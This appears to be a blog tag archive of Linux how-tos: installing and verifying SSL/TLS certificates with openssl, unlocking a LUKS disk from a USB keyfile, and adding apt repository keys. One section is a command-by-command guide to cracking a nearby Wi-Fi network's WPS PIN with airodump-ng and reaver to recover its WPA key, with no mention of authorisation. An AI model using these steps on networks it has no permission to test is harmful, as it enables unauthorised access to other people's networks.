Tag Archives: key

How to install/change SSL/TLS certificate

How to add new SSL/TLS certificate

If you need to set up HTTPS, you will need a new SSL/TLS certificate:
1. Collect the information that goes into the certificate signing request (CSR):

    Country Name (2 letter code)
    State or Province Name (full name)
    Locality Name (eg, city)
    Organization Name (eg, company)
    Organizational Unit Name (eg, section)
    Common Name (e.g. server FQDN or YOUR name)
    Email Address
    The Common Name is the FQDN clients connect to, i.e. your serving hostname. Modern browsers ignore the Common Name and match the hostname against the Subject Alternative Name (SAN) extension, so every hostname the certificate should cover has to be listed as a SAN; public CAs have stopped including the Organizational Unit and generally ignore the Email Address.

2. Generate a private key and certificate request:

openssl req -out cert.csr -new -newkey rsa:2048 -nodes -keyout cert.key

-nodes writes the private key unencrypted, so restrict it right away (chmod 600 cert.key) and never send it anywhere; the CA only needs cert.csr. Inspect the request with openssl req -noout -text -in cert.csr before submitting it.

3. Buy the certificate from a CA, submitting the generated CSR (the key stays on your server).
4. Add the certificate to expiration monitoring (if you have monitoring).
5. Install it on your server (see below).

How to install/change SSL/TLS certificate

1. If you received a .pfx (PKCS#12) file, unpack it with:

openssl pkcs12 -in domain.pfx -out certificate -nodes

You will be asked for the import password. This writes the private key (unencrypted, because of -nodes) and every certificate in the bundle into the single PEM file certificate; split it into a key file and a certificate file (each block is delimited by BEGIN/END lines) and restrict the key file's permissions.
2. You should end up with about 4 files:

    domain-name.crt — X.509 certificate file for your domain
    domain-name.csr — X.509 certificate request file
    intermediate.crt — X.509 certificate of the intermediate CA that signed your certificate
    domain-name.key — RSA private key file matching the certificate

3. Check that the files belong together:

openssl rsa -noout -modulus -in cert.key
openssl req -noout -modulus -in cert.csr
openssl x509 -noout -modulus -in cert.crt

All three must print the same modulus. If the certificate's modulus differs from the key's, the CA issued it for a different CSR and the web server will refuse to load the pair (key values mismatch).
4. Check the validity dates of the new certificate:

openssl x509 -noout -dates -in cert.crt

5. Check that the domain and intermediate certificates are compatible:

openssl verify -CAfile intermediate.crt domain-name.crt
domain-name.crt: OK

If you have several intermediate certificates, put them into one intermediate.crt file. Note that openssl verify also consults the system trust store, which is why this form succeeds when the intermediate's root is installed there; the precise form passes the intermediates with -untrusted intermediate.crt and only the root (or the system store) as the trust anchor via -CAfile.
6. Create the chain certificate file:

cat domain-name.crt intermediate.crt > cert.crt

The first certificate must be your domain's and the intermediate(s) follow it in issuing order. The root is not needed, clients already have it.
7. Put cert.crt and cert.key into the server's ssl folder (the key readable only by root or the web server user)
8. Restart the web server
9. Check that the certificate was updated successfully:

openssl s_client -connect domain.name:443 -servername domain.name 2>/dev/null < /dev/null | openssl x509 -noout -dates

-servername sends the hostname via SNI, so you see the certificate browsers get rather than the server's default; with < /dev/null the client disconnects right after the handshake instead of waiting for input.

Checking for missing intermediate certificate

If your browser says the site is untrusted and you get the following output:

openssl s_client -connect display.intencysrv.com:443 -showcerts
CONNECTED(00000003)
depth=0 OU = Domain Control Validated, OU = PositiveSSL, CN = display.intencysrv.com
verify error:num=20:unable to get local issuer certificate
verify return:1
depth=0 OU = Domain Control Validated, OU = PositiveSSL, CN = display.intencysrv.com
verify error:num=27:certificate not trusted
verify return:1
depth=0 OU = Domain Control Validated, OU = PositiveSSL, CN = display.intencysrv.com
verify error:num=21:unable to verify the first certificate
verify return:1
<...>

then you are probably missing the intermediate certificate: the server sent only its own certificate (depth=0) and the client cannot find its issuer. Get the intermediate from your CA (the issuer is named in your certificate's Issuer field), check that it is compatible and install it (steps 5 and 6 above). You can check remotely that the downloaded intermediate certificate is compatible:

openssl s_client -connect domain.name:443 -CAfile ca.crt

and look for Verify return code: 0 (ok) in the output. OpenSSL has to reach a self-signed root, so ca.crt should contain the intermediate together with its root; alternatively pass -partial_chain to accept the intermediate itself as the trust anchor.

Remember,
Apache supports a bundled certificate file (chain appended to SSLCertificateFile) starting from 2.4.8. With older Apache versions put the intermediate into SSLCertificateChainFile instead, otherwise you will get a missing-intermediate error like the one above. nginx has always expected the bundled file in ssl_certificate.
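As an added example (not code from the original post), the following script exercises steps 3 to 6 above and the missing-intermediate symptom against a constructed test chain: it creates a throwaway root CA, an intermediate and a server certificate for the made-up host www.example.com in a temporary directory, so it runs offline without a commercial CA or a live server. Everything in it (the CA names, the example.com hostnames, the openssl.cnf it writes) is assumed for illustration; it needs OpenSSL 1.1.1 or newer.

```shell
#!/bin/sh
# Added example, not from the original post. Builds a throwaway root -> intermediate
# -> server certificate chain in a temp directory, then runs the post's checks on it:
# matching moduli (step 3), validity dates (step 4), chain verification with and
# without the intermediate (step 5 and the "missing intermediate" symptom), and the
# order of the bundled cert.crt (step 6). All names are made up; needs OpenSSL 1.1.1+.
set -eu

if ! command -v openssl >/dev/null 2>&1; then
  echo "openssl not installed; skipping" >&2
  exit 0
fi

WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT
CFG=$WORK/openssl.cnf
ROOT=$WORK/root.crt; INT=$WORK/intermediate.crt
KEY=$WORK/domain-name.key; CSR=$WORK/domain-name.csr; CRT=$WORK/domain-name.crt
CHAIN=$WORK/cert.crt; WRONG=$WORK/wrong-order.crt

# Self-contained config so the run does not depend on the system openssl.cnf.
cat >"$CFG" <<'EOF'
[ req ]
distinguished_name = dn
prompt = no
[ dn ]
CN = placeholder
[ v3_ca ]
basicConstraints = critical, CA:TRUE
keyUsage = critical, keyCertSign, cRLSign
subjectKeyIdentifier = hash
[ v3_int ]
basicConstraints = critical, CA:TRUE, pathlen:0
keyUsage = critical, keyCertSign, cRLSign
subjectKeyIdentifier = hash
authorityKeyIdentifier = keyid
[ v3_leaf ]
basicConstraints = CA:FALSE
keyUsage = critical, digitalSignature, keyEncipherment
extendedKeyUsage = serverAuth
subjectAltName = DNS:www.example.com, DNS:example.com
EOF

# Constructed fixture standing in for a commercial CA: a root, an intermediate it
# signed, and the server key/CSR from the post's step 2 signed by that intermediate.
build_fixture() {
  openssl req -x509 -config "$CFG" -new -newkey rsa:2048 -nodes -sha256 -days 3650 \
    -subj /CN=Example-Test-Root -extensions v3_ca \
    -keyout "$WORK/root.key" -out "$ROOT" 2>/dev/null
  openssl req -config "$CFG" -new -newkey rsa:2048 -nodes -sha256 \
    -subj /CN=Example-Test-Intermediate \
    -keyout "$WORK/intermediate.key" -out "$WORK/intermediate.csr" 2>/dev/null
  openssl x509 -req -in "$WORK/intermediate.csr" -CA "$ROOT" -CAkey "$WORK/root.key" \
    -CAcreateserial -days 1825 -sha256 -extfile "$CFG" -extensions v3_int -out "$INT" 2>/dev/null
  # -nodes leaves the server key unencrypted, so lock its permissions immediately.
  openssl req -config "$CFG" -new -newkey rsa:2048 -nodes -sha256 \
    -subj "/C=US/O=Example Corp/CN=www.example.com" -keyout "$KEY" -out "$CSR" 2>/dev/null
  chmod 600 "$KEY"
  openssl x509 -req -in "$CSR" -CA "$INT" -CAkey "$WORK/intermediate.key" \
    -CAcreateserial -days 365 -sha256 -extfile "$CFG" -extensions v3_leaf -out "$CRT" 2>/dev/null
  cat "$CRT" "$INT" >"$CHAIN"    # correct: server certificate first, then intermediate
  cat "$INT" "$CRT" >"$WRONG"    # the mistake step 6 warns about
}

# Step 3: key, CSR and certificate must carry the same RSA modulus.
moduli_match() {  # key csr crt -> ok | mismatch
  k=$(openssl rsa -noout -modulus -in "$1" 2>/dev/null)
  r=$(openssl req -noout -modulus -in "$2" 2>/dev/null)
  c=$(openssl x509 -noout -modulus -in "$3" 2>/dev/null)
  [ "$k" = "$r" ] && [ "$r" = "$c" ] && echo ok || echo mismatch
}

# Step 4: -checkend fails if the certificate expires within N seconds (30 days here).
expiry_ok() {  # crt -> ok | expiring
  openssl x509 -noout -checkend 2592000 -in "$1" >/dev/null 2>&1 && echo ok || echo expiring
}

# Step 5: -CAfile holds the trust anchor, -untrusted the intermediates to chain through.
# Leaving the intermediate out reproduces "unable to get local issuer certificate".
chain_ok() {  # leaf root [intermediate] -> ok | fail
  leaf=$1; root=$2; shift 2
  if [ $# -gt 0 ]; then set -- -untrusted "$1"; fi
  openssl verify -CAfile "$root" "$@" "$leaf" 2>/dev/null | grep -q ': OK$' && echo ok || echo fail
}

# Step 6: openssl x509 reads only the first PEM block, so the subject it prints must be
# the server's, not the intermediate's; browsers reject a bundle with the order reversed.
first_cert_is() {  # chainfile expected-cn -> ok | wrong
  openssl x509 -noout -subject -nameopt RFC2253 -in "$1" 2>/dev/null | grep -q "CN=$2" && echo ok || echo wrong
}

chain_length() {  # chainfile -> number of PEM certificates in it
  grep -c 'BEGIN CERTIFICATE' "$1"
}

build_fixture
echo "moduli match:                       $(moduli_match "$KEY" "$CSR" "$CRT")"
echo "not expiring within 30 days:        $(expiry_ok "$CRT")"
echo "verifies with intermediate:         $(chain_ok "$CRT" "$ROOT" "$INT")"
echo "verifies without intermediate:      $(chain_ok "$CRT" "$ROOT")"
echo "cert.crt starts with server cert:   $(first_cert_is "$CHAIN" www.example.com) ($(chain_length "$CHAIN") certs)"
echo "wrong-order.crt starts with server: $(first_cert_is "$WRONG" www.example.com)"
```

Run it with sh; the same four functions work unchanged on a real domain-name.key, domain-name.csr, domain-name.crt and the CA's intermediate. What the script cannot do offline is step 9: for that, the s_client line above with -servername against the running server is the final check.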

Howto hack WPS in wi-fi networks

Install reaver from here

Install the aircrack-ng tools from here

or install them from the standard repository, on Ubuntu:

apt-get install aircrack-ng

Next, run
iwconfig

to find your wireless interface, on Ubuntu typically wlan0, and bring it up:
ifconfig wlan0 up

Then run airmon-ng start wlan0. It creates a new monitor-mode interface, mon0 (newer aircrack-ng versions name it wlan0mon instead; use whatever name airmon-ng prints).

airodump-ng mon0
This lists the wifi networks around you; choose one to attack and note its channel and MAC address (BSSID). Stop it with
CTRL+C

reaver -i mon0 -b <BSSID> -c <channel> -vv

(fill in the BSSID and channel you noted from airodump-ng). Then wait for reaver to find the WPS PIN and, through it, the WPA key.
Because the AP confirms the 8-digit PIN in two halves, the brute force takes at most about 20 hours. Many access points lock WPS after a few failed PINs, which stalls the attack until the lock expires.

Ubuntu: booting an encrypted fs with the key on a usb stick

Install Ubuntu server with two partitions:

  • sda1 /boot
  • sda2 encrypted partition

Make sda2 a LUKS-encrypted partition with LVM volumes inside it.
Once the system is ready you can boot it by entering the passphrase on the keyboard,
but that is tedious, so we want to boot from a keyfile on a usb stick instead.
mkdir /key && mount /dev/sdb1 /key # sdb1 is the partition on my usb stick

dd if=/dev/urandom of=/key/keyfile bs=1K count=10

Restrict the keyfile (chmod 0400 /key/keyfile) and register it in a free LUKS key slot with cryptsetup luksAddKey /dev/sda2 /key/keyfile (you will be asked for the existing passphrase). Keep that passphrase: it is your fallback when the stick is missing. Anyone holding the stick can unlock the disk, so treat it like the passphrase itself.

Create the file /etc/initramfs-tools/scripts/local-top/luks_key_mount with the following content

#!/bin/sh

PREREQ=""
prereqs() { echo "$PREREQ"; }

case $1 in
prereqs)
     prereqs
     exit 0
     ;;
esac

. /scripts/functions

log_begin_msg "Decrypting root filesystem using a key file."
wait_for_udev

# Give the usb stick a few seconds to be enumerated instead of a fixed sleep.
tries=0
while [ ! -b /dev/sdb1 ] && [ "$tries" -lt 10 ]; do
  /bin/sleep 1
  tries=$((tries + 1))
done

mkdir -p /key
if /bin/mount -t ext4 -o ro /dev/sdb1 /key 2>/dev/null &&
   /sbin/cryptsetup luksOpen /dev/sda2 crypt_sda2 --key-file /key/keyfile; then
  # Container is open; release the stick so it can be pulled out.
  /bin/umount /key
else
  # No stick, or the keyfile did not match any key slot: the root check below
  # drops to the panic shell, where the volume can be opened by hand with the passphrase.
  /bin/umount /key 2>/dev/null || true
  log_failure_msg "Keyfile not found or rejected; open /dev/sda2 manually."
fi
log_end_msg

if [ ! -b /dev/mapper/srvlvm-srvlvmroot ]
then
  panic "
Welcome to Linux command prompt.
"
fi
exit 0

# in that script /dev/sdb1 — my usb flash card (device names can change between boots;
#   a /dev/disk/by-uuid/... path for the stick is more reliable)
# /dev/sda2 — my encrypted partition
# /dev/mapper/srvlvm-srvlvmroot — lvm root partition
chmod +x /etc/initramfs-tools/scripts/local-top/luks_key_mount

update-initramfs -u

Before rebooting, confirm the script and cryptsetup made it into the image with lsinitramfs /boot/initrd.img-$(uname -r) | grep -e luks_key_mount -e cryptsetup, and keep console access handy: without the stick you land in the panic shell and must open the volume with the passphrase.

reboot

Repositories (K) Ubuntu

Working with repositories in (K) Ubuntu

nano /etc/apt/sources.list:

add any repositories you need here (or put each one in its own file under /etc/apt/sources.list.d/).

sudo aptitude update and install any software.

But if you see an error saying key 5A9BF3BB4E5E17B5 is not found (apt reports it as NO_PUBKEY 5A9BF3BB4E5E17B5, meaning the key that signed the repository's Release file is not installed):

gpg --recv-keys 5A9BF3BB4E5E17B5
gpg --armor --export 5A9BF3BB4E5E17B5 | apt-key add -

after that sudo aptitude update and install software.

or

sudo apt-key adv --recv-keys --keyserver keyserver.ubuntu.com  5A9BF3BB4E5E17B5

Fetching a key by ID only proves that someone published a key with that ID. Before trusting it, compare its full fingerprint (gpg --fingerprint 5A9BF3BB4E5E17B5) with the one in the repository's documentation, because any key added here can sign packages that install as root. apt-key is deprecated on current releases: put the key in a file under /etc/apt/trusted.gpg.d/ or, better, reference it from the source line with [signed-by=/path/to/key.gpg] so it is trusted for that repository only.